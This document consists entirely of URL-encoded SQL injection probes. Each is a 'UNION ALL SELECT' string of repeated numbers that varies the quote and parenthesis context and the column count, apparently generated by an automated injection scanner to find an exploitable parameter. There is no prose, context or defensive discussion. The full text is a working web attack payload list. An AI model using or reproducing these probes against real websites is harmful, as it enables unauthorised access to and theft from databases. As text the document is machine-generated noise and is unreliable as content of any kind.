-7355%27%20UNION%20ALL%20SELECT%207123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123%2C7123--%20 -8762%27%20UNION%20ALL%20SELECT%204763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763%2C4763--%20 -9802%27%20UNION%20ALL%20SELECT%208407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407%2C8407--%20 -7708%27%20UNION%20ALL%20SELECT%209052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052%2C9052--%20 -3330%22%29%20UNION%20ALL%20SELECT%209739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739%2C9739--%20 -6020%22%29%20UNION%20ALL%20SELECT%204277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277--%20 -5561%22%29%20UNION%20ALL%20SELECT%206701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701--%20 -8391%22%29%20UNION%20ALL%20SELECT%201118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118%2C1118--%20 -5713%22%29%20UNION%20ALL%20SELECT%206843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843%2C6843--%20 -1268%22%29%20UNION%20ALL%20SELECT%203553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553--%20 -5393%22%29%20UNION%20ALL%20SELECT%203382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382--%20 -5521%22%29%20UNION%20ALL%20SELECT%207715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715%2C7715--%20 -2877%22%29%20UNION%20ALL%20SELECT%209285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285%2C9285--%20 -7284%22%29%20UNION%20ALL%20SELECT%209700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700--%20 -2439%22%29%29%20UNION%20ALL%20SELECT%202467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467%2C2467--%20 -1583%22%29%29%20UNION%20ALL%20SELECT%207596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596%2C7596--%20 -2213%22%29%29%20UNION%20ALL%20SELECT%206011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011%2C6011--%20 -1023%22%29%29%20UNION%20ALL%20SELECT%209942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942%2C9942--%20 -3371%22%29%29%20UNION%20ALL%20SELECT%204354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354--%20 -8750%22%29%29%20UNION%20ALL%20SELECT%208256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256%2C8256--%20 -3489%22%29%29%20UNION%20ALL%20SELECT%208751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751%2C8751--%20 -9563%22%29%29%20UNION%20ALL%20SELECT%207336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336%2C7336--%20 -7050%22%29%29%20UNION%20ALL%20SELECT%208073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073%2C8073--%20 -6914%22%29%29%20UNION%20ALL%20SELECT%207545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545%2C7545--%20 -2718%22%29%29%29%20UNION%20ALL%20SELECT%203598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598--%20 -1325%22%29%29%29%20UNION%20ALL%20SELECT%209652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652--%20 -2708%22%29%29%29%20UNION%20ALL%20SELECT%204726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726--%20 -3220%22%29%29%29%20UNION%20ALL%20SELECT%203293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293%2C3293--%20 -7198%22%29%29%29%20UNION%20ALL%20SELECT%205926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926%2C5926--%20 -3557%22%29%29%29%20UNION%20ALL%20SELECT%209187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187%2C9187--%20 -7795%22%29%29%29%20UNION%20ALL%20SELECT%201700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700%2C1700--%20 -7368%22%29%29%29%20UNION%20ALL%20SELECT%201518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518--%20 -1917%22%29%29%29%20UNION%20ALL%20SELECT%208872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872%2C8872--%20 -5135%22%29%29%29%20UNION%20ALL%20SELECT%207403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403%2C7403--%20 -7843%22%20UNION%20ALL%20SELECT%207928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928%2C7928--%20 -3239%22%20UNION%20ALL%20SELECT%205270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270--%20 -8625%22%20UNION%20ALL%20SELECT%201215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215%2C1215--%20 -2889%22%20UNION%20ALL%20SELECT%208402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402%2C8402--%20 -1279%22%20UNION%20ALL%20SELECT%201950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950%2C1950--%20 -6096%22%20UNION%20ALL%20SELECT%204726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726%2C4726--%20 -8662%22%20UNION%20ALL%20SELECT%204891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891%2C4891--%20 -1735%22%20UNION%20ALL%20SELECT%202623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623%2C2623--%20 -8799%22%20UNION%20ALL%20SELECT%209943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943--%20 -9345%22%20UNION%20ALL%20SELECT%203210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210--%20 -5778%22%29%20UNION%20ALL%20SELECT%207157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157%2C7157--%20 -5355%22%29%20UNION%20ALL%20SELECT%208728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728--%20 -2267%22%29%20UNION%20ALL%20SELECT%206049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049%2C6049--%20 -4172%22%29%20UNION%20ALL%20SELECT%204067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067%2C4067--%20 -9864%22%29%20UNION%20ALL%20SELECT%202722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722%2C2722--%20 -6432%22%29%20UNION%20ALL%20SELECT%202328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328%2C2328--%20 -2205%22%29%20UNION%20ALL%20SELECT%205858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858%2C5858--%20 -5129%22%29%20UNION%20ALL%20SELECT%207900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900%2C7900--%20 -1409%22%29%20UNION%20ALL%20SELECT%205417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417%2C5417--%20 -5819%22%29%20UNION%20ALL%20SELECT%202137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137--%20 -8911%22%29%29%20UNION%20ALL%20SELECT%208689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689--%20 -6094%22%29%29%20UNION%20ALL%20SELECT%207420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420%2C7420--%20 -3672%22%29%29%20UNION%20ALL%20SELECT%202460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460%2C2460--%20 -1129%22%29%29%20UNION%20ALL%20SELECT%207199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199%2C7199--%20 -1539%22%29%29%20UNION%20ALL%20SELECT%201787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787%2C1787--%20 -9868%22%29%29%20UNION%20ALL%20SELECT%206799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799%2C6799--%20 -9011%22%29%29%20UNION%20ALL%20SELECT%206603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603%2C6603--%20 -8672%22%29%29%20UNION%20ALL%20SELECT%203242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242%2C3242--%20 -5139%22%29%29%20UNION%20ALL%20SELECT%201902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902%2C1902--%20 -6203%22%29%29%20UNION%20ALL%20SELECT%205804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804%2C5804--%20 -5189%22%29%29%29%20UNION%20ALL%20SELECT%202784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784%2C2784--%20 -6399%22%29%29%29%20UNION%20ALL%20SELECT%202583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583%2C2583--%20 -2783%22%29%29%29%20UNION%20ALL%20SELECT%204830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830%2C4830--%20 -8475%22%29%29%29%20UNION%20ALL%20SELECT%201742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742--%20 -6644%22%29%29%29%20UNION%20ALL%20SELECT%202447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447--%20 -5579%22%29%29%29%20UNION%20ALL%20SELECT%204316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316%2C4316--%20 -8670%22%29%29%29%20UNION%20ALL%20SELECT%204609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609%2C4609--%20 -3001%22%29%29%29%20UNION%20ALL%20SELECT%207253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253--%20 -2065%22%29%29%29%20UNION%20ALL%20SELECT%202657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657%2C2657--%20 